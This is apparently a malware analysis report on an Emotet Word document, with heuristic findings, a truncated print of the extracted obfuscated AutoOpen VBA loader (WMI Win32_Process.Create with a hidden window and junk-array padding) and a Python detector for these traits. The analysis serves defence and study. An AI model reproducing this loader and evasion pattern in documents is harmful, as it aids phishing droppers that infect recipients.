Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 b17213bfb8a22ff2…

MALICIOUS

Office (OLE)

Size: 124.6 KB · Created: 2019-05-20 18:13:00 · Authoring application: Microsoft Office Word · First seen: 2019-08-04
MD5: c87862331ac0364634c10b72cb8dd3a3 · SHA-1: cad083aad1ef654dfbb6e8d9957e1dc9e242f1f9 · SHA-256: b17213bfb8a22ff2a198592df2a0baf8d02f92eb3ec7b3699c5f292b5f6a7a04
Risk Score: 342

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1566.001 Spearphishing Attachment · T1059 Command and Scripting Interpreter · T1059.005 Visual Basic

The sample contains critical heuristic firings indicating an obfuscated auto-exec VBA loader designed to execute a payload. The extracted macro confirms the chain: the 'autoopen' entry point calls a helper that assembles the WMI monikers "Winmgmts:Win32_ProcessStartup" and "Winmgmts:Win32_Process" from split, mixed-case string fragments passed through GetObject, sets ShowWindow to 0 (vbFalse - vbFalse, a hidden window) on the startup object, and then calls Win32_Process.Create with a command line built at run time from identifiers not shown in the preview plus two MSForms TextBox controls declared in the document module (I811_2.L16662 and I811_2.X_31642). No shell command, URL or CreateObject string therefore appears in the macro source, and the large never-read numeric arrays are padding meant to defeat pattern matching. A process started through Win32_Process.Create is spawned by the WMI provider host rather than directly by WINWORD.EXE, which is why this loader prefers it to Shell or WScript.Shell. ClamAV independently names the file Doc.Downloader.Emotet-10001946-0, consistent with Emotet's document-based downloader stage.

Heuristics 9

  • ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. In this sample the marker is the same AutoOpen entry point present in the recovered VBA project (macros.bas below), so this firing corroborates OLE_VBA_AUTOOPEN rather than adding an independent finding.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is the standard DrawingML schema namespace embedded by Office for drawing objects, not a download location; the macro's command line carries no literal URL.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)   4206 bytes
SHA-256: a92eee10183ae041d18ad60405c473226dc0c8abad5e81ca8cc2d260c5457bce
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "I811_2"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "X_31642, 0, 0, MSForms, TextBox"
Attribute VB_Control = "L16662, 1, 1, MSForms, TextBox"

Attribute VB_Name = "q12644_"
Sub d8776626()
   Dim Y0247487()
      ReDim Y0247487(24864)
      Y0247487(24744) = "627199811" + "907303612" + "12425063"
      Y0247487(24729) = "87680550" + "606261060"
      Y0247487(24829) = "896301423" + "445210771"
      Y0247487(24754) = "364195319" + "808704564" + "922864956"
      Y0247487(24714) = "36584079" + "779570041"
      Y0247487(24784) = "205639954" + "440920310"
   Dim p031_7()
      ReDim p031_7(24864)
      p031_7(24744) = "719802697" + "964398285" + "191176996"
      p031_7(24729) = "190802845" + "947555802"
      p031_7(24829) = "363950012" + "284639939"
      p031_7(24754) = "20712113" + "713566333" + "323232271"
      p031_7(24714) = "317340377" + "663752868"
      p031_7(24784) = "623686699" + "480409517"
End Sub
Sub _
autoopen( _
)
   Dim j0100899()
      ReDim j0100899(47911)
      j0100899(47853) = "831892424" + "623581217" + "278161893"
      j0100899(47854) = "553839367" + "875808733"
      j0100899(47881) = "394684919" + "288346731"
      j0100899(47815) = "278984084" + "214912338" + "481173501"
      j0100899(47736) = "26749023" + "403687659"
      j0100899(47764) = "445119542" + "811100338"
c4420699
   Dim G43598_4()
      ReDim G43598_4(1007)
      G43598_4(880) = "948270363" + "526529949" + "747711125"
      G43598_4(833) = "172870975" + "817318495"
      G43598_4(934) = "812783548" + "496694827"
      G43598_4(973) = "195141411" + "262390936" + "49209422"
      G43598_4(886) = "806147999" + "466204719"
      G43598_4(960) = "929989600" + "917556520"
End Sub
Sub c4420699()
   Dim P7382704()
      ReDim P7382704(1007)
      P7382704(880) = "250999004" + "675235840" + "744922082"
      P7382704(833) = "422359893" + "845857177"
      P7382704(934) = "296230093" + "672977116"
      P7382704(973) = "182560622" + "313314638" + "617957021"
      P7382704(886) = "93109596" + "501257154"
      P7382704(960) = "925283675" + "772593957"
Set F72913 = GetObject(CStr("Winmgmt" + _
"s:Win32_ProcesSstartup"))
   Dim R4796061()
      ReDim R4796061(53102)
      R4796061(53006) = "612394091" + "736479700" + "727340033"
      R4796061(53011) = "367165601" + "156288858"
      R4796061(52985) = "134454598" + "868542883"
      R4796061(52933) = "641109693" + "662142160" + "594096699"
      R4796061(53034) = "510383652" + "416840218"
      R4796061(53055) = "138466033" + "386976466"
F72913. _
ShowWindow = vbFalse - vbFalse
   Dim j04_07()
      ReDim j04_07(76150)
      j04_07(76116) = "876809162" + "83743505" + "375556447"
      j04_07(76037) = "286037766" + "533142935"
      j04_07(76038) = "538119040" + "752747608"
      j04_07(76095) = "310822791" + "692415985" + "711354002"
      j04_07(76057) = "936175451" + "11523341"
      j04_07(76037) = "614710358" + "27877687"
Set C71525 = GetObject(CStr("Winmgmt" + _
"s:Win32_ProcesS"))
   Dim c0064862()
      ReDim c0064862(76150)
      c0064862(76116) = "916634029" + "247500470" + "906703586"
      c0064862(76037) = "996985723" + "675937696"
      c0064862(76038) = "582753707" + "459440517"
      c0064862(76095) = "586765188" + "846752756" + "311546239"
      c0064862(76057) = "473487155" + "182263562"
      c0064862(76037) = "460036999" + "265558348"
C71525.Create E17204__ + "po" + O91_010 + I811_2.L16662 + I811_2.X_31642 + k09_8_, E92918, F72913, I7310_
   Dim J1831608()
      ReDim J1831608(29245)
      J1831608(29142) = "965104020" + "760544860" + "331550039"
      J1831608(29114) = "527310352" + "861044921"
      J1831608(29089) = "759708522" + "909355294"
      J1831608(29154) = "674406536" + "533441435" + "716112725"
      J1831608(29107) = "216179042
... (truncated)
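The WMI launcher, auto-exec and obfuscated-loader heuristics above can be reproduced by hand on the extracted source. The following is an added example written for this report, not code from the analysis platform and not oletools: it joins VBA line continuations, folds split string literals, and then looks for the Winmgmts:Win32_Process moniker, the .Create call and its run-time-assembled command line, the hidden ShowWindow setting, the auto-exec entry point, and the share of dead numeric-array padding. SAMPLE_VBA is a constructed excerpt that mirrors the macro preview, not the full 4206-byte file; the regexes are the example's own and ignore the "" escape inside VBA literals.

```python
"""Reproduce the AutoOpen / WMI Win32_Process launcher / obfuscated-loader
checks against an extracted VBA macro, without oletools.

Added example for this report, not code from the analysis platform.
SAMPLE_VBA is a constructed excerpt that mirrors the macro preview above.
"""
import json
import re

SAMPLE_VBA = r'''Sub _
autoopen( _
)
   Dim j0100899()
      ReDim j0100899(47911)
      j0100899(47853) = "831892424" + "623581217" + "278161893"
      j0100899(47854) = "553839367" + "875808733"
c4420699
End Sub
Sub c4420699()
   Dim P7382704()
      ReDim P7382704(1007)
      P7382704(880) = "250999004" + "675235840" + "744922082"
Set F72913 = GetObject(CStr("Winmgmt" + _
"s:Win32_ProcesSstartup"))
F72913. _
ShowWindow = vbFalse - vbFalse
Set C71525 = GetObject(CStr("Winmgmt" + _
"s:Win32_ProcesS"))
C71525.Create E17204__ + "po" + O91_010 + I811_2.L16662 + I811_2.X_31642 + k09_8_, E92918, F72913, I7310_
End Sub
'''

AUTOEXEC = re.compile(
    r'\b(?:Sub|Function)\s+(AutoOpen|Auto_Open|AutoExec|AutoClose|AutoExit|'
    r'Document_Open|Document_Close|Workbook_Open|Workbook_Activate)\b', re.I)
LIT_CONCAT = re.compile(r'"([^"]*)"\s*[+&]\s*"([^"]*)"')   # "a" + "b" -> "ab"
JUNK_LINE = re.compile(                                     # dead numeric-array padding
    r'^\s*(?:Dim\s+\w+\(\)|ReDim\s+\w+\(\d+\)|'
    r'\w+\(\d+\)\s*=\s*"\d+"(?:\s*[+&]\s*"\d+")*)\s*$', re.I)
WMI_MONIKER = re.compile(r'"winmgmts:[^"]*?win32_process(?:startup)?"', re.I)
CREATE_CALL = re.compile(r'(\w+)\.Create\s+(.+)', re.I)
IDENT = re.compile(r'\b[A-Za-z_]\w*(?:\.[A-Za-z_]\w*)*')


def normalize_vba(src: str) -> str:
    """Undo the two source-level tricks used here: ' _' line continuations and
    string literals split with + or &.  The "" escape is not handled (triage only)."""
    text = re.sub(r'[ \t]+_\r?\n[ \t]*', ' ', src)      # join continued lines
    text = re.sub(r'\.\s+(?=\w)', '.', text)            # 'obj. Member' -> 'obj.Member'
    prev = None
    while prev != text:                                 # fold until no "x" + "y" pair is left
        prev = text
        text = LIT_CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), text)
    return text


def analyze_vba(src: str) -> dict:
    """Return the heuristic findings for one macro module as a dict."""
    lines = [ln for ln in src.splitlines() if ln.strip()]
    junk = sum(1 for ln in lines if JUNK_LINE.match(ln))
    text = normalize_vba(src)
    report = {
        'autoexec': sorted({m.group(1).lower() for m in AUTOEXEC.finditer(text)}),
        'wmi_monikers': sorted({m.group(0).strip('"').lower()
                                for m in WMI_MONIKER.finditer(text)}),
        'hidden_window': re.search(r'\.ShowWindow\s*=', text, re.I) is not None,
        'junk_lines': junk,
        'junk_ratio': round(junk / len(lines), 2) if lines else 0.0,
        'create_calls': [],
    }
    for m in CREATE_CALL.finditer(text):
        # Win32_Process.Create(CommandLine, CurrentDirectory, ProcessStartupInformation, ProcessId)
        cmdline = m.group(2).split(',')[0].strip()
        report['create_calls'].append({
            'object': m.group(1),
            'cmdline_expr': cmdline,
            'literal_only': re.fullmatch(r'"[^"]*"', cmdline) is not None,
            # identifiers (including Form.Control references) that feed the command line at run time
            'runtime_inputs': IDENT.findall(re.sub(r'"[^"]*"', '', cmdline)),
        })
    report['wmi_process_launcher'] = (
        any(mk.endswith('win32_process') for mk in report['wmi_monikers'])
        and bool(report['create_calls']))
    return report


if __name__ == '__main__':
    print(json.dumps(analyze_vba(SAMPLE_VBA), indent=2))
```

Running it against the excerpt reports the autoopen entry point, both Win32_Process monikers, the hidden window, a .Create call whose command line is not a string literal but a concatenation of five identifiers (two of them the I811_2 TextBox controls), and seven padding lines out of twenty-one. The folding step is what matters: before normalization neither "winmgmts" nor "Win32_Process" exists as a contiguous string, which is exactly the gap the OLE_VBA_WMI_PROCESS_CREATE description calls out.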